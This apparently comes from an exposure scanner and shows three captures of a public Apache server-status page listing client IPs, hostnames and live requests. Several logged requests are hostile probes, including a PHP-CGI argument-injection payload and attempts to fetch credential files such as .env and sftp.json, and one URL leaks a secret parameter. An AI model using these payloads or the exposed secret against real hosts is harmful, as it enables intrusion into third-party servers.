27.61634555321483590.08.78184.71 172.70.135.60h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/399/5017_ 28.844820033440510.09.08114.68 172.68.135.77h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/27/5384_ 11.981344031178480.00.39251.79 104.22.7.19h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/24/5325_ 12.902110097767920.00.77201.61 172.68.176.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/21/5435_ 12.3824695822588770.00.24187.76 54.36.142.130http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/24/5400_ 12.4221044677991980.00.68166.04 185.103.243.40http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 2-479683930/26/5391_ 11.972469028305530.023.13233.19 172.68.135.141h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/30/5521_ 11.1521053525865970.00.15206.28 172.68.234.64h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/28/5434_ 13.17135019121397880.01.09247.15 162.159.113.47h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-479683930/25/5452_ 9.761344030498120.00.33184.72 162.158.179.175h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-479683930/26/5306_ 13.16135320329960960.00.91226.95 162.159.113.47h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/31/5530_ 13.18134917531522310.01.00151.72 162.159.113.47h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-479683980/257/7381_ 21.129043379550.04.35245.06 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 3-479683980/241/7228_ 21.184057165600.03.40242.14 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-479683980/250/7058_ 21.1730121527900.03.67271.61 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-479683980/223/7187_ 21.177049277850.04.59240.88 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-479683980/235/7454_ 21.186047964480.02.49228.14 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-479683980/244/7045_ 21.178045757840.07.39229.48 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-479683980/233/7259_ 21.121057969550.03.64225.04 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 3-479683980/207/7467_ 21.076050550010.01.53342.13 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-479683980/237/7348_ 21.181047882250.07.77242.25 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-479683980/236/7275_ 21.179039662670.016.80226.77 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 4-479683920/18/3657_ 9.3436500137672110.00.56185.09 162.158.178.22h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-479683920/17/3548_ 9.324813021941740.00.19107.48 172.71.215.211h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-479683920/27/3679_ 12.003656013712880.01.16131.15 172.69.65.122h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-479683920/27/3681_ 11.063651132872150.00.55167.37 172.71.150.219h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-479683920/28/3719_ 12.013655024649790.00.4899.29 172.71.166.137h2tandemsl.com:443idl
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3891c14cd
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 21-Dec-2025 09:17:56 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 42 Parent Server MPM Generation: 41 Server uptime: 8 days 2 hours 13 minutes 50 seconds Server load: 0.02 0.05 0.05 Total accesses: 218639 - Total Traffic: 7.8 GB - Total Duration: 172191798 CPU Usage: u40.98 s42.55 cu1279.72 cs782.98 - .307% CPU load .313 requests/sec - 11.7 kB/second - 37.4 kB/request - 787.562 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0852740no0yes010000 1852737no0yes010000 2852739no2yes19001 3852935no0yes010000 4852738no0yes010000 Sum502 149001 ________________________W_________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-418527400/5/4314_ 6.4818383320538820.00.17183.10 172.69.109.71h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-418527400/6/4489_ 6.48184024171670.00.11147.03 172.69.109.71h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-418527400/8/4242_ 6.19179057427450.00.11173.10 104.23.175.202h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-418527400/10/4456_ 6.55184024012430.00.34154.11 162.159.106.78h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-418527400/6/4293_ 5.1117834721326830.00.06102.36 104.23.221.13h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-418527400/5/4549_ 6.53178062561220.00.02151.22 162.158.175.96h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-418527400/10/4442_ 6.53179025201670.00.10209.75 198.41.227.171h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-418527400/4/4530_ 6.3017929119366630.00.09146.76 141.101.76.186h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-418527400/6/4344_ 6.3017919818200740.00.02243.28 141.101.76.186h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-418527400/2/4368_ 6.15179022346650.00.00147.46 172.70.175.87h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-418527370/3/3881_ 6.261145017074420.00.01164.06 172.71.124.222h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-418527370/2/3785_ 2.4211452517882110.00.00105.93 188.114.111.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-418527370/4/3704_ 5.751145014929310.00.11137.93 172.71.150.210h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-418527370/2/3718_ 4.0811405012956960.00.0168.44 178.128.105.234http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-418527370/4/3806_ 6.221140117459160.00.02140.62 172.68.138.153h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-418527370/2/3834_ 1.971251020920460.00.00138.02 161.97.108.245http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env.rar HTTP/1.1 1-418527370/2/3636_ 5.131246436135838420.00.09100.22 172.71.144.133h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-418527370/3/3807_ 1.971140024821170.00.02137.09 161.97.108.245http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /version.php HTTP/1.1 1-418527370/2/3748_ 2.3912465414897000.00.01142.82 103.214.61.67http/1.1relehse.com:443GET /xmlrpc.php HTTP/1.1 1-418527370/2/3916_ 6.261145028874150.00.0184.33 162.158.162.96h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-418527390/122/4779_ 11.733025081590.02.25243.84 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-418527390/124/4715_ 11.75891490471200.02.11193.46 162.158.88.70h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-418527390/146/4793_ 11.67392820500500.01.39169.32 172.68.164.47h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-418527390/145/4795_ 11.6041165098560.02.59152.66 128.199.182.55http/1.1pre.relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-418527390/143/4761W 11.750024114740.01.26199.47 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-418527390/128/4879_ 11.64128720495100.02.42198.27 172.71.167.97h2tandemsl.com:443idle, streams: 0/2/2/0/1 (open/recv/resp/push/rst) 2-418527390/131/4837_ 11.734019327090.02.02235.80 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 2-418527390/134/4873_ 11.754028068200.01.55174.10 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-418527390/144/4708_ 11.69498623780810.07.99212.77 162.158.189.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-418527390/136/4911_ 11.757026884100.01.76141.47 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-418529350/150/5480_ 11.9922529777820.03.04209.85 188.114.111.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-418529350/144/5506_ 12.107044506780.02.34207.23 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-418529350/150/5340_ 12.1210110169190.02.24235.08 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-418529350/133/5376_ 12.08150140321110.02.57172.47 104.22.17.47h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-418529350/155/5537_ 12.122036791980.02.43187.92 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-418529350/160/5280_ 12.123034698480.03.05179.05 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-418529350/145/5521_ 12.116048283540.03.24195.12 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-418529350/147/5575_ 12.118040347790.03.26257.98 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-418529350/168/5488_ 12.0532237126510.04.80191.57 162.158.122.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-418529350/149/5390_ 12.00631027745480.02.36180.96 172.70.135.60h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-418527380/1/3384_ 0.1411380136653040.00.00137.96 162.158.175.19h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-418527380/3/3306_ 5.17113851721218630.00.03104.71 104.23.211.45h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-418527380/2/3448_ 6.0835480113131010.00.09127.67 172.69.109.70h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-418527380/3/3426_ 5.821143032259120.00.01162.22 172.71.124.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-418527380/2/3493_ 3.743495323811450.00.0189.03 178.128.105.234http/1.1barrerasdecontencion.com:443done, streams:
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3db4b9526
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 19-Dec-2025 10:32:18 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 31 Parent Server MPM Generation: 30 Server uptime: 6 days 3 hours 28 minutes 11 seconds Server load: 0.17 0.19 0.13 Total accesses: 180427 - Total Traffic: 6.5 GB - Total Duration: 117687977 CPU Usage: u35.53 s33.77 cu994.96 cs606.44 - .315% CPU load .34 requests/sec - 12.9 kB/second - 38.0 kB/request - 652.275 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0713994no1yes010000 1713861no0yes010000 2713864no0yes010000 3713862no1yes19000 4713863no0yes010000 Sum502 149000 ________________________________W_________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-307139940/173/3863_ 12.004016936550.07.04138.51 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 0-307139940/186/4001_ 11.924018581560.019.77119.08 172.68.22.229h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-307139940/192/3751_ 12.023023088230.06.79154.81 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-307139940/185/3975_ 12.021019494550.013.76119.47 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-307139940/175/3852_ 11.901019565640.09.2396.12 104.23.172.60h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-307139940/205/4127_ 11.9415125475080.07.26128.70 172.68.23.135h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-307139940/183/3991_ 12.0014122525950.034.70189.61 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-307139940/180/4083_ 11.97121716180230.026.98134.70 172.70.42.97h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-307139940/178/3863_ 12.0114015355490.05.87205.35 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-307139940/188/3892_ 12.027017471180.07.39135.73 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-307138610/10/3214_ 4.3371012958850.00.14122.34 172.68.229.132h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/6/3076_ 4.9769013478050.00.0290.15 172.68.23.102h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/15/3012_ 4.94712910849180.00.80124.60 172.71.164.65h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/12/3053_ 4.976918963390.00.3846.22 172.68.22.217h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/11/3115_ 4.9270012476260.00.08126.44 104.23.172.71h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/10/3138_ 4.9769016575680.00.17108.32 172.68.22.202h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/13/2975_ 4.9769021366460.01.0582.65 172.68.22.125h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/7/3106_ 4.9770020393670.00.6894.06 172.68.22.48h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/10/3079_ 4.9571010682760.00.52127.65 104.23.166.82h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/15/3243_ 4.9869024602680.00.2271.30 172.68.23.116h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/12/4318_ 5.0069115462860.01.23224.81 172.68.22.126h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/12/4286_ 5.0068182946720.00.28185.82 172.68.22.214h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/16/4293_ 4.8768014714740.00.32159.53 162.10.161.82http/1.1cinre-backend.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/16/4345_ 5.0068054255210.00.17144.89 172.68.22.55h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/12/4275_ 4.9868117337550.00.64188.66 172.68.22.107h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/13/4420_ 5.0068016755360.00.20157.70 172.68.22.54h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/13/4366_ 4.87711217155090.00.27226.58 162.10.161.82http/1.1cinre-backend.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/12/4408_ 5.0069019586690.00.07159.97 172.68.23.35h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/14/4243_ 4.9768019795000.00.54198.95 172.71.182.187h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/11/4428_ 5.0069318459890.00.05131.99 172.68.22.165h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-307138620/187/3668_ 11.327013324170.02.00150.71 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-307138620/179/3755_ 11.318026010450.03.89145.61 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-307138620/162/3551W 11.280090247080.013.46185.74 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-307138620/171/3535_ 11.321014712010.02.66137.24 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-307138620/176/3730_ 11.326022840210.02.44108.44 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-307138620/172/3503_ 11.253012883310.05.99129.92 172.68.22.179h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-307138620/165/3705_ 11.323022927900.039.29158.16 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-307138620/169/3722_ 11.242218468450.03.12164.15 172.68.22.68h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-307138620/183/3640_ 11.256014948230.010.68147.33 172.68.22.78h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-307138620/188/3584_ 11.317013971340.02.01115.18 206.189.225.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 4-307138630/13/2987_ 4.86710134285750.01.24131.17 172.70.47.135h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-307138630/8/2896_ 4.8371018712630.00.1294.07 172.70.47.37h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-307138630/20/3037_ 4.9069010704170.01.31118.20 172.68.23.2h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-307138630/18/3039_ 4.89701629690670.00.40153.29 172.68.22.129h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-307138630/11/3115_ 4.8671021415910.00.6478.82 141.101.76.119h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-307138630/11/2941_ 4.90
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3b67aa6b5
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 16-Dec-2025 18:14:32 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 19 Parent Server MPM Generation: 18 Server uptime: 3 days 11 hours 10 minutes 26 seconds Server load: 0.03 0.06 0.08 Total accesses: 92774 - Total Traffic: 3.2 GB - Total Duration: 77544330 CPU Usage: u42.38 s27.89 cu502.89 cs316.07 - .297% CPU load .31 requests/sec - 11.2 kB/second - 36.3 kB/request - 835.841 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0355706no0yes010000 1355703no0yes010000 2355838no1yes010000 3355704no0yes010000 4355705no1yes19000 Sum502 149000 ____________________________________________W_____ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-183557060/14/2297_ 4.97283210976890.00.0775.45 139.59.132.8http/1.1pre.relehse.com:443GET /admin_layout/assets/img/.DS_Store HTTP/1.1 0-183557060/22/2236_ 4.56283111899240.00.3738.95 172.71.163.130h2lcftech.es:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 0-183557060/20/2139_ 4.54283016653010.00.5685.75 172.71.163.140h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-183557060/23/2373_ 4.61288013880270.022.4067.38 172.71.163.141h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-183557060/21/2235_ 4.58283014336920.00.2544.41 172.71.163.144h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/18/2349_ 4.60288020111190.00.9957.72 172.71.163.144h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/16/2275_ 4.97283216467790.00.1966.16 139.59.132.8http/1.1pre.relehse.com:443GET /admin_layout/assets/.DS_Store HTTP/1.1 0-183557060/24/2299_ 4.95293111409180.01.6652.81 104.23.251.238h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-183557060/12/2201_ 4.9728329841470.00.0881.77 139.59.132.8http/1.1pre.relehse.com:443GET /admin_layout/.DS_Store HTTP/1.1 0-183557060/21/2251_ 4.60293011270760.00.5973.61 172.71.163.138h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-183557030/16/1764_ 4.1828204923580.00.0795.23 108.162.237.39h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/23/1630_ 5.4903757755360.02.3340.23 172.68.92.165h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/16/1615_ 4.19106409650.00.4086.21 104.22.24.198h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/19/1656_ 5.39282445670690.00.7224.72 139.59.132.8http/1.1pre.relehse.com:443GET /noticias/.DS_Store HTTP/1.1 1-183557030/15/1700_ 4.7129017424680.00.6988.07 172.68.92.200h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/24/1617_ 4.22290010594040.02.7663.63 104.22.7.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/22/1593_ 4.9927718230930.00.3251.08 172.71.163.137h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/12/1695_ 4.99277412527520.01.3864.29 172.71.163.149h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/28/1611_ 5.39282154540180.01.8191.90 188.114.111.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-183557030/25/1756_ 5.482010896960.00.8037.94 68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-183558380/409/2317_ 20.52708816790.020.00160.18 68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-183558380/394/2383_ 20.503076320350.08.8973.61 68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 2-183558380/386/2368_ 20.51908260630.010.2188.36 68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-183558380/395/2350_ 20.5027059984160.08.4172.88 172.68.92.184h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-183558380/372/2361_ 20.533011062230.011.5794.40 68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-183558380/414/2416_ 20.4976009215820.014.1560.93 172.71.150.177h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-183558380/391/2413_ 20.51409818810.025.95112.72 68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-183558380/372/2427_ 20.535012648010.06.9082.69 68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-183558380/399/2319_ 20.536010349870.031.1198.67 68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-183558380/385/2505_ 20.516010607160.07.0159.50 68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-183557040/20/1859_ 4.65126106096510.00.4162.87 172.71.163.146h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-183557040/11/1819_ 3.761256011623700.01.2590.59 108.162.238.4h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/16/1713_ 3.221259078567060.00.1078.79 172.69.255.133h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/12/1735_ 4.2328560937552110.00.1962.88 87.58.86.94http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/9/1940_ 4.611259014476790.00.3953.91 172.71.163.137h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/12/1717_ 3.22125916246590.00.2950.86 172.69.255.133h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/10/1865_ 4.64285113611110.00.7067.68 172.71.163.146h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/17/1950_ 4.6429009778870.00.3455.98 172.71.163.149h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-183557040/11/1862_ 4.631256206903670.00.2958.29 87.58.86.94http/1.1relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-183557040/11/1766_ 4.9829006643450.00.2748.46 172.70.214.54h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-183557050/276/1065_ 17.2200129127530.07.9168.40 68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-183557050/274/1049_ 16.561637795318070.08.8044.57 2.136.78.3http/1.1excel.tandemhse.com:80GET /lcf/index_lcf.php?secret=YWlzIHNlY3MgbWFpIGNvdWVu&view=apu 4-183557050/358/1157_ 17.141293693000.010.8665.17 2.136.78.3http/1.1excel.tandemhse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-183557050/272/1162_ 17.2217022260890.028.1681.38 